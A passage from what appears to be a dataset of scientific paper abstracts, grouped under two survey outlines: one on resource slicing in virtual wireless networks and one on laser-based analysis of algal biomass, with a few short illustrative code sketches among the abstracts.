of ensuring fairness in the resource distribution, while maximizing the total throughput. Our algorithm works by adapting the contention window configuration of each virtual WLAN to the channel activity in order to ensure optimal operation. We conduct a control-theoretic analysis of our system to appropriately design the parameters of the controller and prove system stability, and undertake an extensive simulation study to show that our proposal optimizes performance under different types of traffic. The results show that the mechanism provides a fair resource distribution independent of the number of stations and their level of activity, and is able to react promptly to changes in the network conditions while ensuring stable operation. --- paper_title: Airtime-based resource control in wireless LANs for wireless network virtualization paper_content: Wireless network virtualization is needed to build a virtual network over wireless and wired networks, which enables a rapid deployment of novel mobile services or novel mobile network architectures on a shared infrastructure. This paper proposes an airtime-based resource control technique for wireless network virtualization, in which wireless network resources are allocated among competing virtual networks while keeping their programmability. 
A WLAN system adopting the proposed technique is developed by enhancing an IEEE 802.11e EDCA (Enhanced Distributed Channel Access) MAC (Media Access Control) mechanism. The operation of the resource control technique is demonstrated by a simulation and the performance of airtime usage and throughput are investigated. It is shown that technique can successfully control the wireless network resource allocations with a target ratio even under conditions when the WLAN system suffers interferences. --- paper_title: SplitAP: Leveraging Wireless Network Virtualization for Flexible Sharing of WLANs paper_content: Providing air-time guarantees across a group of clients forms a fundamental building block in sharing an access point (AP) across different virtual network providers. Though this problem has a relatively simple solution for downlink group scheduling through traffic engineering at the AP, solving this problem for uplink (UL) traffic presents a challenge for fair sharing of wireless hotspots. Among other issues, the mechanism for uplink traffic control has to scale across a large user base, and provide flexible operation irrespective of the client channel conditions and network loads. In this study, we propose the SplitAP architecture that address the problem of sharing uplink airtime across groups of users by extending the idea of network virtualization. Our architecture allows us to deploy different algorithms for enforcing UL airtime fairness across client groups. In this study, we will highlight the design features of the SplitAP architecture, and present results from evaluation on a prototype deployed with: (1) LPFC and (2) LPFC+, two algorithms for controlling UL group fairness. Performance comparisons on the ORBIT testbed show that the proposed algorithms are capable of providing group air-time fairness across wireless clients irrespective of the network volume, and traffic type. The algorithms show up to 40% improvement with a modified Jain fairness index. --- paper_title: Space Versus Time Separation for Wireless Virtualization on an Indoor Grid paper_content: The decreasing cost of wireless hardware and ever increasing number of wireless testbeds has led to a shift in the protocol evaluation paradigm from simulations towards emulation. In addition, with a large number of users demanding experimental resources and lack of space and time for deploying more hardware, fair resource sharing among independent co-existing experiments is important. We study the proposed approaches to wireless virtualization with a focus on schemes conserving wireless channels rather than nodes. Our detailed comparison reveals that while experiments sharing a channel by space separation achieve better efficiency than those relying on time separation of a channel, the isolation between experiments in both cases is comparable. We propose and implement a policy manager to alleviate the isolation problem and suggest scenarios in which either of the schemes would provide a suitable virtualization solution. --- paper_title: Virtual WiFi: bring virtualization from wired to wireless paper_content: As virtualization trend is moving towards "client virtualization", wireless virtualization remains to be one of the technology gaps that haven't been addressed satisfactorily. Today's approaches are mainly developed for wired network, and are not suitable for virtualizing wireless network interface due to the fundamental differences between wireless and wired LAN devices that we will elaborate in this paper. 
We propose a wireless LAN virtualization approach named virtual WiFi that addresses the technology gap. With our proposed solution, the full wireless LAN functionalities are supported inside virtual machines; each virtual machine can establish its own connection with self-supplied credentials; and multiple separate wireless LAN connections are supported through one physical wireless LAN network interface. We designed and implemented a prototype of our proposed virtual WiFi approach and conducted a detailed performance study. Our results show that, with conventional virtualization overhead mitigation mechanisms, our proposed approach can support fully functional wireless functions inside a VM and achieve close-to-native wireless LAN performance with moderately increased CPU utilization. --- paper_title: Supporting Integrated MAC and PHY Software Development for the USRP SDR paper_content: Software Defined Radios (SDR) offer great runtime flexibility both at the physical and MAC layer. This makes them an attractive platform for the development of cognitive radios that can adapt to changes in channel conditions, traffic load, and user requirements. However, to realize this goal, we need a software framework that supports both MAC protocol and PHY layer development in an integrated fashion. In this paper we report on our experience in using two different software frameworks for integrated PHY-MAC development for SDRs: GNU Radio, which was originally designed to support PHY layer development, and Click, a framework for protocol development. We also discuss a number of broader system considerations, such as what functionality should be offloaded to the SDR device. --- paper_title: Building Programmable Wireless Networks: An Architectural Survey paper_content: In recent times, there is increasing consensus that the traditional Internet architecture needs to be evolved for it to sustain unstinted growth and innovation. A major reason for the perceived architectural ossification is the lack of the ability to program the network as a system. This situation has resulted partly from historical decisions in the original Internet design which emphasized decentralized network operations through colocated data and control planes on each network device. The situation for wireless networks is no different, resulting in a lot of complexity and a plethora of largely incompatible wireless technologies. With traditional architectures providing limited support for programmability, there is a broad realization in the wireless community that future programmable wireless networks would require significant architectural innovations. In this paper, we will present a unified overview of the programmability solutions that have been proposed at the device and the network level. In particular, we will discuss software-defined radio (SDR), cognitive radio (CR), programmable MAC processor, and programmable routers as device-level programmability solutions, and software-defined networking (SDN), cognitive wireless networking (CWN), virtualizable wireless networking (VWN) and cloud-based wireless networking (CbWN) as network-level programmability solutions. We provide both a self-contained exposition of these topics as well as a broad survey of the application of these trends in modern wireless networks.
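Several of the WLAN entries above (the control-theoretic virtual WLAN configuration, the airtime-based EDCA control, and SplitAP) steer each virtual network's airtime share by adapting 802.11 contention parameters. The sketch below shows the shape of such a proportional controller on the minimum contention window; the gain, bounds, and example numbers are assumptions for illustration, not any one paper's controller.

```python
# Illustrative proportional controller on CWmin: if a virtual WLAN is getting
# more than its target airtime share, enlarge its contention window so it defers
# more often; if it is under target, shrink it. Gain and bounds are assumptions.
def adapt_cwmin(cwmin, measured_share, target_share,
                gain=256, cw_lo=15, cw_hi=1023):
    error = measured_share - target_share      # > 0: slice is using too much airtime
    cw = cwmin + gain * error                  # proportional correction
    return int(min(max(cw, cw_lo), cw_hi))

print(adapt_cwmin(cwmin=31,  measured_share=0.55, target_share=0.30))  # 95  (defer more)
print(adapt_cwmin(cwmin=255, measured_share=0.10, target_share=0.30))  # 203 (defer less)
```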
--- paper_title: TAISC: A cross-platform MAC protocol compiler and execution engine paper_content: Abstract MAC protocols significantly impact wireless performance metrics such as throughput, energy consumption and reliability. Although the choice of the optimal MAC protocol depends on time-varying criteria such as the current application requirements and the current environmental conditions, MAC protocols cannot be upgraded after deployment since their implementations are typically written in low level, hardware specific code which is hard to reuse on other hardware platforms. To remedy this shortcoming, this paper introduces TAISC, Time Annotated Instruction Set Computer, a framework for hardware independent MAC protocol development and management. The solution presented in this paper allows describing MAC protocols in a platform independent language, followed by a straightforward compilation step, yielding dedicated binary code, optimized for specific radio chips. The compiled code is as efficient in terms of memory footprint as custom-written protocols for specific devices. To enable time-critical operation, the TAISC compiler adds exact time annotations to every instruction of the optimized binary code. As a result, the TAISC approach can be used for energy-efficient cross-platform MAC protocol design, while achieving up to 97% of the theoretical throughput at an overhead of only 20 µs per instruction. --- paper_title: OpenRadio: a programmable wireless dataplane paper_content: We present OpenRadio, a novel design for a programmable wireless dataplane that provides modular and declarative programming interfaces across the entire wireless stack. Our key conceptual contribution is a principled refactoring of wireless protocols into processing and decision planes. The processing plane includes directed graphs of algorithmic actions (eg. 54Mbps OFDM WiFi or special encoding for video). The decision plane contains the logic which dictates which directed graph is used for a particular packet (eg. picking between data and video graphs). The decoupling provides a declarative interface to program the platform while hiding all underlying complexity of execution. An operator only expresses decision plane rules and corresponding processing plane action graphs to assemble a protocol. The scoped interface allows us to build a dataplane that arguably provides the right tradeoff between performance and flexibility. Our current system is capable of realizing modern wireless protocols (WiFi, LTE) on off-the-shelf DSP chips while providing flexibility to modify the PHY and MAC layers to implement protocol optimizations. --- paper_title: Current trends and perspectives in wireless virtualization paper_content: The objective of this paper is to survey and compare recent works in the field of wireless virtualization in order to identify potential applications, common trends and future research directions. First, this paper briefly summarizes different wireless virtualization architectures as well as both enabling and enabled technologies related to wireless virtualization. Then, this paper proposes a wireless virtualization classification based on the type of virtualized resources and the depth of slicing. The three main perspectives identified are data and flow-based perspective, protocol-based perspective and spectrum-based perspective. A hypothetical ecosystem scenario of a future virtualized wireless infrastructure in which these perspectives coexist is explored. 
Finally, the challenges and requirements of a sustainable wireless virtualization framework are discussed. --- paper_title: Wireless network virtualization paper_content: Virtualization of wired networks and end computing systems has become one of the leading trends in networked ICT systems. In contrast relatively little virtualization has occurred in infrastructure based wireless networks, but the idea of virtualizing wireless access is gaining attention as it has the potential to improve spectrum utilization and perhaps create new services. In this paper we survey the state of the current research in virtualizing wireless networks. We define and describe possible architectures, the issues, hurdles and trends towards implementation of wireless network virtualization. --- paper_title: Towards a scalable and near-sighted control plane architecture for WiFi SDNs paper_content: Not much is known today about how to reap the SDN benefits in WiFi networks-a critical use case given the increasing importance of WiFi networks. This paper presents AeroFlux, a scalable software-defined wireless network, that supports large enterprise and carrier WiFi deployments with low-latency programmatic control of fine-grained WiFi-specific transmission settings. This is achieved through AeroFlux's hierarchical design. We report on an early prototype implementation and evaluation, showing that AeroFlux can significantly reduce control plane traffic. --- paper_title: SoftRAN: software defined radio access network paper_content: An important piece of the cellular network infrastructure is the radio access network (RAN) that provides wide-area wireless connectivity to mobile devices. The fundamental problem the RAN solves is figuring out how best to use and manage limited spectrum to achieve this connectivity. In a dense wireless deployment with mobile nodes and limited spectrum, it becomes a difficult task to allocate radio resources, implement handovers, manage interference, balance load between cells, etc. We argue that LTE's current distributed control plane is suboptimal in achieving the above objective. We propose SoftRAN, a fundamental rethink of the radio access layer. SoftRAN is a software defined centralized control plane for radio access networks that abstracts all base stations in a local geographical area as a virtual big-base station comprised of a central controller and radio elements (individual physical base stations). In defining such an architecture, we create a framework through which a local geographical network can effectively perform load balancing and interference management, as well as maximize throughput, global utility, or any other objective. ---
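The OpenRadio entry above refactors the wireless stack into a decision plane (rules that pick a processing path per packet) and a processing plane (directed graphs of signal-processing actions). A minimal sketch of that decoupling is given below; the rule predicates and graph names are illustrative assumptions, not OpenRadio's interface.

```python
# Toy decision-plane/processing-plane split in the spirit of OpenRadio: rules
# inspect packet metadata and select a named processing graph; the graphs
# themselves are just ordered lists of stages here. Names are illustrative.
PROCESSING_GRAPHS = {
    "wifi_ofdm_54": ["scramble", "conv_encode_3/4", "qam64_map", "ofdm_mod"],
    "video_robust": ["scramble", "conv_encode_1/2", "qpsk_map", "ofdm_mod"],
}

DECISION_RULES = [  # evaluated in order; first match wins
    (lambda pkt: pkt.get("traffic_class") == "video", "video_robust"),
    (lambda pkt: True,                                "wifi_ofdm_54"),
]

def select_graph(pkt):
    for predicate, graph_name in DECISION_RULES:
        if predicate(pkt):
            return graph_name, PROCESSING_GRAPHS[graph_name]
    raise LookupError("no rule matched")

print(select_graph({"traffic_class": "video", "len": 1400})[0])   # video_robust
print(select_graph({"traffic_class": "best_effort"})[0])          # wifi_ofdm_54
```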
Title: Resource Slicing in Virtual Wireless Networks: A Survey Section 1: INTRODUCTION Description 1: Introduce the major concerns of wireless networks, the concept of Wireless Network Virtualization (WNV), and outline the focus of the survey on wireless resource slicing, its challenges, and existing techniques. Section 2: RELATED CONCEPTS Description 2: Describe three enablers of wireless slicing: Wireless Network Virtualization (WNV), Software Defined Networking (SDN), and Network Function Virtualization (NFV), and review existing works on these topics. Section 3: Wireless Network Virtualization Description 3: Detail the concept, goals, and challenges of Wireless Network Virtualization (WNV) as an enabler for slicing wireless networks. Section 4: Software Defined Networking Description 4: Explain the concept of SDN, its implications for wireless slicing, and review relevant literature on SDN tools and frameworks. Section 5: Network Function Virtualization Description 5: Describe NFV, its role as an enabler for wireless slicing, and review pertinent research efforts. Section 6: THE SLICING APPROACH Description 6: Define the concept of slicing in network virtualization and introduce the motivations for slicing a wireless network. Section 7: PROBLEM DESCRIPTION Description 7: Identify and detail the problems of resource allocation and isolation in wireless slicing, including a brief introduction to medium access techniques. Section 8: Medium Access Techniques Description 8: Provide an overview of medium access control methods in LTE and IEEE 802.11 standards to contextualize the challenges in wireless slicing. Section 9: Resource Allocation Description 9: Discuss the complexities of assigning resources to different slices in wireless networks, including potential models and mechanisms for resource allocation. Section 10: Isolation Description 10: Discuss the isolation problem in wireless slicing, highlighting the challenges of maintaining slice specifications over time. Section 11: EXISTING APPROACHES FOR WIRELESS SLICING Description 11: Review existing mechanisms proposed for wireless slicing, focusing on solutions for LTE, WiMAX, and IEEE 802.11 technologies. Section 12: Research Challenges Description 12: Explore the remaining challenges and open research directions in wireless resource slicing, such as isolation in random access networks, technology-agnostic solutions, dynamics, time constraints, real deployments, user mobility, and more. Section 13: CONCLUSION Description 13: Summarize the survey, highlighting the integral role of slicing in wireless network virtualization and the challenges that remain to be addressed.
Algal Biomass Analysis by Laser-Based Analytical Techniques—A Review
9
--- paper_title: High-resolution analysis of trace elements in crustose coralline algae from the North Atlantic and North Pacific by laser ablation ICP-MS paper_content: We have investigated the trace elemental composition in the skeleta of two specimens of attached-living coralline algae of the species Clathromorphum compactum from the North Atlantic (Newfoundland) and Clathromorphum nereostratum from the North Pacific/Bering Sea region (Amchitka Island, Aleutians). Samples were analyzed using Laser Ablation-Inductively Coupled Plasma Mass Spectrometry (LA-ICP-MS), yielding for the first time continuous individual trace elemental records of up to 69 years in length. The resulting algal Mg/Ca, Sr/Ca, U/Ca, and Ba/Ca ratios are reproducible within individual sample specimens. Algal Mg/Ca ratios were additionally validated by electron microprobe analyses (Amchitka sample). Algal Sr/Ca, U/Ca, and Ba/Ca ratios were compared to algal Mg/Ca ratios, which previously have been shown to reliably record sea surface temperature (SST). Ratios of Sr/Ca from both Clathromorphum species show a strong positive correlation to temperature-dependent Mg/Ca ratios, implying that seawater temperature plays an important role in the incorporation of Sr into algal calcite. Linear Sr/Ca-SST regressions have provided positive, but weaker relationships as compared to Mg/Ca-SST relationships. Both algal Mg/Ca and Sr/Ca display clear seasonal cycles. Inverse correlations were found between algal Mg/Ca and U/Ca, Ba/Ca, and correlations to SST are weaker than between Mg/Ca, Sr/Ca and SST. This suggests that the incorporation of U and Ba is influenced by other factors aside from temperature. --- paper_title: Production and harvesting of microalgae for wastewater treatment, biofuels, and bioproducts. paper_content: The integration of microalgae-based biofuel and bioproducts production with wastewater treatment has major advantages for both industries. However, major challenges to the implementation of an integrated system include the large-scale production of algae and the harvesting of microalgae in a way that allows for downstream processing to produce biofuels and other bioproducts of value. Although the majority of algal production systems use suspended cultures in either open ponds or closed reactors, the use of attached cultures may offer several advantages. With regard to harvesting methods, better understanding and control of autoflocculation and bioflocculation could improve performance and reduce chemical addition requirements for conventional mechanical methods that include centrifugation, tangential filtration, gravity sedimentation, and dissolved air flotation. There are many approaches currently used by companies and industries using clean water at laboratory, bench, and pilot scale; however, large-scale systems for controlled algae production and/or harvesting for wastewater treatment and subsequent processing for bioproducts are lacking. Further investigation and development of large-scale production and harvesting methods for biofuels and bioproducts are necessary, particularly with less studied but promising approaches such as those involving attached algal biofilm cultures. --- paper_title: Triacylglycerol profiling of marine microalgae by mass spectrometry.
paper_content: We present a method for the determination of triacylglycerol (TAG) profiles of oleaginous saltwater microalgae relevant for the production of biofuels, bioactive lipids, and high-value lipid-based chemical precursors. We describe a technique to remove chlorophyll using quick, simple solid phase extraction (SPE) and directly compare the intact TAG composition of four microalgae species (Phaeodactylum tricornutum, Nannochloropsis salina, Nannochloropsis oculata, and Tetraselmis suecica) using MALDI time-of-flight (TOF) mass spectrometry (MS), ESI linear ion trap-orbitrap (LTQ Orbitrap) MS, and ¹H NMR spectroscopy. Direct MS analysis is particularly effective to compare the polyunsaturated fatty acid (PUFA) composition for triacylglycerols because oxidation can often degrade samples upon derivatization. Using these methods, we observed that T. suecica contains significant PUFA levels with respect to other microalgae. This method is applicable for high-throughput MS screening of microalgae TAG profiles and may aid in the commercial development of biofuels. --- paper_title: Freshening of the Alaska Coastal Current recorded by coralline algal Ba/Ca ratios paper_content: Arctic Ocean freshening can exert a controlling influence on global climate, triggering strong feedbacks on ocean-atmospheric processes and affecting the global cycling of the world's oceans. Glacier-fed ocean currents such as the Alaska Coastal Current are important sources of freshwater for the Bering Sea shelf, and may also influence the Arctic Ocean freshwater budget. Instrumental data indicate a multiyear freshening episode of the Alaska Coastal Current in the early 21st century. It is uncertain whether this freshening is part of natural multidecadal climate variability or a unique feature of anthropogenically induced warming. In order to answer this, a better understanding of past variations in the Alaska Coastal Current is needed. However, continuous long-term high-resolution observations of the Alaska Coastal Current have only been available for the last 2 decades. In this study, specimens of the long-lived crustose coralline alga Clathromorphum nereostratum were collected within the pathway of the Alaska Coastal Current and utilized as archives of past temperature and salinity. Results indicate that coralline algal Mg/Ca ratios provide a 60 year record of sea surface temperatures and track changes of the Pacific Decadal Oscillation, a pattern of decadal-to-multidecadal ocean-atmosphere climate variability centered over the North Pacific. Algal Ba/Ca ratios (used as indicators of coastal freshwater runoff) are inversely correlated to instrumentally measured Alaska Coastal Current salinity and record the period of freshening from 2001 to 2006. Similar multiyear freshening events are not evident in the earlier portion of the 60 year Ba/Ca record. This suggests that the 21st century freshening of the Alaska Coastal Current is a unique feature related to increasing glacial melt and precipitation on mainland Alaska.
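The coralline algae entries above treat skeletal element ratios (Mg/Ca, Ba/Ca) measured along a laser-ablation track as proxies for sea-surface temperature and runoff, typically via a linear calibration. The snippet below only illustrates applying such a linear proxy calibration to a measured ratio series; the coefficients and ratio values are invented for illustration and are not the calibrations reported in these papers.

```python
# Illustrative proxy calibration: convert a series of algal Mg/Ca ratios
# (e.g., from points along a laser-ablation transect) into temperature estimates
# with an assumed linear relation SST = a * (Mg/Ca) + b. Coefficients and data
# are made up for illustration only.
A_SLOPE, B_OFFSET = 0.1, -2.0          # hypothetical calibration coefficients

def mgca_to_sst(mgca_mmol_mol):
    return A_SLOPE * mgca_mmol_mol + B_OFFSET

transect_mgca = [95.0, 110.0, 130.0, 120.0, 100.0]   # invented mmol/mol values
sst_series = [round(mgca_to_sst(x), 1) for x in transect_mgca]
print(sst_series)   # -> [7.5, 9.0, 11.0, 10.0, 8.0]
```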
--- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace, e.g., the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in the form of an adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra. In our feasibility study we used three different experimental arrangements employing the double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: MALDI-typing of infectious algae of the genus Prototheca using SOM portraits. paper_content: BACKGROUND: MALDI-typing has become a frequently used approach for the identification of microorganisms and recently also of invertebrates. Similarity comparisons are usually based on single-spectral data. We apply self-organizing maps (SOM) to portray the MS-spectral data with individual resolution and to improve the typing of Prototheca algae by using meta-spectra representing prototypes of groups of similar-behaving single spectra. RESULTS: The MALDI-TOF peaklists of more than 300 algae extracts referring to five Prototheca species were transformed into colored mosaic images serving as molecular portraits of the individual samples. The portraits visualize the algae-specific distribution of high- and low-amplitude peaks in two dimensions. Species-specific patterns of MS intensities were readily discernible in terms of unique single spots of high-amplitude MS peaks which collect characteristic fingerprint spectra. The spot patterns allow the visual identification of groups of samples referring to different species, genotypes or isolates. The use of meta-peaks instead of single peaks reduces the dimension of the data and leads to an increased discriminating power in downstream analysis. CONCLUSIONS: We expect that our SOM portrait method improves MS-based classifications and feature selection in upcoming applications of MALDI-typing-based species identification, especially of closely related species. --- paper_title: Biofuels from algae: challenges and potential. paper_content: Algae biofuels may provide a viable alternative to fossil fuels; however, this technology must overcome a number of hurdles before it can compete in the fuel market and be broadly deployed. These challenges include strain identification and improvement, both in terms of oil productivity and crop protection, nutrient and resource allocation and use, and the production of co-products to improve the economics of the entire system. Although there is much excitement about the potential of algae biofuels, much work is still required in the field.
In this article, we attempt to elucidate the major challenges to economic algal biofuels at scale, and improve the focus of the scientific community to address these challenges and move algal biofuels from promise to reality. --- paper_title: Establishment of a bioenergy-focused microalgal culture collection paper_content: A promising renewable energy scenario involves growing photosynthetic microalgae as a biofuel feedstock that can be converted into fungible, energy-dense fuels. Microalgae transform the energy in sunlight into a variety of reduced-carbon storage products, including triacylglycerols, which can be readily transformed into diesel fuel surrogates. To develop an economically viable algal biofuel industry, it is important to maximize the production and accumulation of these targeted bioenergy carriers in selected strains. In an effort to identify promising feedstock isolates we developed, evaluated and optimized contemporary high-throughput cell-sorting techniques to establish a collection of microalgae isolated from highly diverse ecosystems near geographic areas that are potential sites for large-scale algal cultivation in the Southwest United States. These efforts resulted in a culture collection containing 360 distinct microalgal strains. We report on the establishment of this collection and some preliminary qualitative screening studies to identify important biofuel phenotypes including neutral lipid accumulation and growth rates. As part of this undertaking we determined suitable cultivation media and evaluated cryopreservation techniques critical for the long-term storage of the microorganisms in this collection. This technique allows for the rapid isolation of extensive strain biodiversity that can be leveraged for the selection of promising bioenergy feedstock strains, as well as for providing fundamental advances in our understanding of basic algal biology. --- paper_title: Laser-Induced Breakdown Spectroscopy (LIBS), Part II: Review of Instrumental and Methodological Approaches to Material Analysis and Applications to Different Fields paper_content: The first part of this two-part review focused on the fundamental and diagnostics aspects of laser-induced plasmas, only touching briefly upon concepts such as sensitivity and detection limits and largely omitting any discussion of the vast panorama of the practical applications of the technique. Clearly a true LIBS community has emerged, which promises to quicken the pace of LIBS developments, applications, and implementations. With this second part, a more applied flavor is taken, and its intended goal is summarizing the current state-of-the-art of analytical LIBS, providing a contemporary snapshot of LIBS applications, and highlighting new directions in laser-induced breakdown spectroscopy, such as novel approaches, instrumental developments, and advanced use of chemometric tools. More specifically, we discuss instrumental and analytical approaches (e.g., double- and multi-pulse LIBS to improve the sensitivity), calibration-free approaches, hyphenated approaches in which techniques such as Raman and fluorescence are coupled with LIBS to increase sensitivity and information power, resonantly enhanced LIBS approaches, signal processing and optimization (e.g., signal-to-noise analysis), and finally applications. An attempt is made to provide an updated view of the role played by LIBS in the various fields, with emphasis on applications considered to be unique.
We finally try to assess where LIBS is going as an analytical field, where in our opinion it should go, and what should still be done for consolidating the technique as a mature method of chemical analysis. --- paper_title: Determination of the total unsaturation in oils and margarines by Fourier transform Raman spectroscopy paper_content: An improved Raman spectroscopic procedure for the determination of the total unsaturation in oils and fats using Fourier Transform Raman (FT-Raman) spectroscopy is described. An important advantage of FT-Raman for these samples is that the spectra are fluorescence-free, unlike dispersive Raman which often uses visible excitation. Samples can be analyzed without any pre-treatment, thus eliminating the need for dissolution in toxic solvents. The short acquisition time of FT-Raman and the ease of application allowed for a rapid sample turnover. --- paper_title: Bioactive compounds from cyanobacteria and microalgae: an overview. paper_content: Cyanobacteria (blue-green algae) are photosynthetic prokaryotes used as food by humans. They have also been recognized as an excellent source of vitamins and proteins and as such are found in health food stores throughout the world. They are also reported to be a source of fine chemicals, renewable fuel and bioactive compounds. This potential is being realized as data from research in the areas of the physiology and chemistry of these organisms are gathered and the knowledge of cyanobacterial genetics and genetic engineering increased. Their role as antiviral, anti-tumour, antibacterial and anti-HIV agents and as a food additive has been well established. The production of cyanobacteria in artificial and natural environments has been fully exploited. In this review the use of cyanobacteria and microalgae, production processes and biosynthesis of pigments, colorants and certain bioactive compounds are discussed in detail. The genetic manipulation of cyanobacteria and microalgae to improve their quality is also described at length. --- paper_title: A review of the biochemistry of heavy metal biosorption by brown algae. paper_content: The passive removal of toxic heavy metals such as Cd(2+), Cu(2+), Zn(2+), Pb(2+), Cr(3+), and Hg(2+) by inexpensive biomaterials, termed biosorption, requires that the substrate displays high metal uptake and selectivity, as well as suitable mechanical properties for applied remediation scenarios. In recent years, many low-cost sorbents have been investigated, but the brown algae have since proven to be the most effective and promising substrates. It is their basic biochemical constitution that is responsible for this enhanced performance among biomaterials. More specifically, it is the properties of cell wall constituents, such as alginate and fucoidan, which are chiefly responsible for heavy metal chelation. In this comprehensive review, the emphasis is on outlining the biochemical properties of the brown algae that set them apart from other algal biosorbents. A detailed description of the macromolecular conformation of the alginate biopolymer is offered in order to explain the heavy metal selectivity displayed by the brown algae. The role of cellular structure, storage polysaccharides, cell wall and extracellular polysaccharides is evaluated in terms of their potential for metal sequestration. Binding mechanisms are discussed, including the key functional groups involved and the ion-exchange process.
Quantification of metal-biomass interactions is fundamental to the evaluation of potential implementation strategies, hence sorption isotherms, ion-exchange constants, as well as models used to characterize algal biosorption are reviewed. The sorption behavior (i.e., capacity, affinity) of brown algae with various heavy metals is summarized and their relative performance is evaluated. --- paper_title: Spectroscopic analysis using a hybrid LIBS-Raman system paper_content: A novel setup, combining two spectroscopic techniques, laser induced breakdown spectroscopy (LIBS) and Raman spectroscopy in a hybrid unit, is described. The work presented herein is part of a broader project that aims to demonstrate the applicability of the hybrid LIBS-Raman unit as an analytical tool for the investigation of samples and objects of cultural heritage. The system utilizes a nanosecond pulsed Nd:YAG laser (532 nm) for both LIBS and Raman analysis. In the Raman mode, a low intensity beam from the laser probes the sample surface and the scattering signal is collected into a grating spectrograph coupled to an intensified charge-coupled device (ICCD) detector, which records the Raman spectrum. In the LIBS mode a single high intensity pulse from the laser irradiates the sample surface and the time- and spectrally-resolved emission from the resulting laser ablation plume yields the LIBS spectrum. The use of a non-gated CCD detector was found to produce similar quality data (in terms of S/N ratio and fluorescence background) in the Raman mode, while in the LIBS mode spectral features were clearly broader but did not prevent identification of prominent atomic emission lines. Several model pigment samples were examined and the data obtained show the ability of the hybrid unit to record both Raman and LIBS spectra from the same point on the sample, a clear advantage over the use of different analytical setups. --- paper_title: Optimization of outdoor cultivation in flat panel airlift reactors for lipid production by Chlorella vulgaris. paper_content: Microalgae are discussed as a potential renewable feedstock for biofuel production. The production of highly concentrated algae biomass with a high fatty acid content, accompanied by high productivity with the use of natural sunlight, is therefore of great interest. In the current study an outdoor pilot plant with five 30 L Flat Panel Airlift reactors (FPA) installed southwards was operated in 2011 in Stuttgart, Germany. The patented FPA reactor works on the basis of an airlift loop reactor and offers efficient intermixing for homogeneous light distribution. A lipid production process with the microalga Chlorella vulgaris (SAG 211-12), under nitrogen and phosphorus deprivation, was established and evaluated in regard to the fatty acid content, fatty acid productivity and light yield. In the first set of experiments limitations caused by restricted CO₂ availability were excluded by enriching the media with NaOH. The higher alkalinity allows a higher CO₂ content of the supplied air and leads to a doubling of fatty acid productivity. The second set of experiments focused on how the ratio of light intensity to biomass concentration in the reactor impacts fatty acid content, productivity and light yield. The specific light availability was specified as mol photons on the reactor surface per gram biomass in the reactor.
This is the first publication based on experimental data showing the quantitative correlation between specific light availability, fatty acid content and biomass light yield for a lipid production process under nutrient deprivation and outdoor conditions. High specific light availability leads to high fatty acid contents. Lower specific light availability increases fatty acid productivity and biomass light yield. An average fatty acid productivity of 0.39 g L⁻¹ day⁻¹ for a 12-day batch process with a final fatty acid content of 44.6% [w/w] was achieved. A light yield of 0.4 g mol photons⁻¹ was obtained for the first 6 days of cultivation. --- paper_title: High-resolution Mg/Ca ratios in a coralline red alga as a proxy for Bering Sea temperature variations from 1902 to 1967 paper_content: We present the first continuous, high-resolution record of Mg/Ca variations within an encrusting coralline red alga, Clathromorphum nereostratum, from Amchitka Island, Aleutian Islands. Mg/Ca ratios of individual growth increments were analyzed by measuring a single-point, electron-microprobe transect, yielding a resolution of ~15 samples/year and a 65-year record (1902–1967) of variations. Results show that Mg/Ca ratios in the high-Mg calcite algal framework display pronounced annual cyclicity and archive late spring–late fall sea-surface temperatures (SST) corresponding to the main season of algal growth. Mg/Ca values correlate well to local SST, as well as to an air temperature record from the same region. High spatial correlation to large-scale SST variability in the subarctic North Pacific is observed, with patterns of strongest correlation following the direction of major oceanographic features that play a key role in the exchange of water masses between the North Pacific and the Bering Sea. Our data correlate well with a shorter Mg/Ca record, supporting the ability of the alga to reliably record regional environmental signals. In addition, Mg/Ca ratios relate well to a 29-year δ¹⁸O time series measured on the same sample, providing additional support for the use of Mg in coralline red algae as a paleotemperature proxy that, unlike algal δ¹⁸O, is not influenced by salinity fluctuations. Moreover, electron microprobe–based analysis enables higher sampling resolution and faster analysis, thus providing a promising approach for future studies of longer C. nereostratum records and applications to other coralline species. --- paper_title: A combined laser-induced breakdown and Raman spectroscopy Echelle system for elemental and molecular microanalysis paper_content: Raman and laser-induced breakdown spectroscopy are integrated into a single system for molecular and elemental microanalyses. Both analyses are performed on the same ~0.002 mm² sample spot, allowing the assessment of sample heterogeneity on a micrometric scale through mapping and scanning. The core of the spectrometer system is a novel high resolution dual arm Echelle spectrograph utilized for both techniques. In contrast to scanning Raman spectroscopy systems, the Echelle–Raman spectrograph provides a high resolution spectrum in a broad spectral range of 200–6000 cm⁻¹ without moving the dispersive element. The system displays comparable or better sensitivity and spectral resolution in comparison to a state-of-the-art scanning Raman microscope and allows short analysis times for both Raman and laser induced breakdown spectroscopy.
The laser-induced breakdown spectroscopy performance of the system is characterized by ppm detection limits, high spectral resolving power (15,000), and broad spectral range (290–945 nm). The capability of the system is demonstrated with the mapping of heterogeneous mineral samples and layer-by-layer analysis of pigments, revealing the advantages of combining the techniques in a single unified set-up. --- paper_title: In vivo NMR studies of higher plants and algae paper_content: This chapter discusses in vivo nuclear magnetic resonance (NMR) studies of higher plants and algae. As the opportunity arose for biologists to apply the emerging techniques of NMR spectroscopy to systems of biological interest, it was perhaps inevitable that they would first use NMR to study the properties of water in cells and tissues. The advantages of studying the water non-invasively, in an unperturbed system, were apparently only partly offset by the problems of interpretation that arose from the heterogeneity of living systems, and a considerable literature developed in this field. High-resolution multinuclear NMR spectroscopy permits the detection of certain ions and metabolites in vivo, as well as the tissue water, and thus increases the potential enormously for tackling biochemical and physiological problems non-invasively; while NMR imaging, although still relying on the detection of the water signal, provides a method for mapping the spatial distribution of the water in the sample. The potential importance of these techniques to biologists and physiologists meant that their interests and requirements began to be reflected in the design of NMR equipment, and this accelerated the application of the new techniques to physiological problems. In vivo NMR studies have always emphasized the non-invasive character of the investigation, and the chapter illustrates how this important property is exploited in studies of higher plants and algae. --- paper_title: Anti-HIV 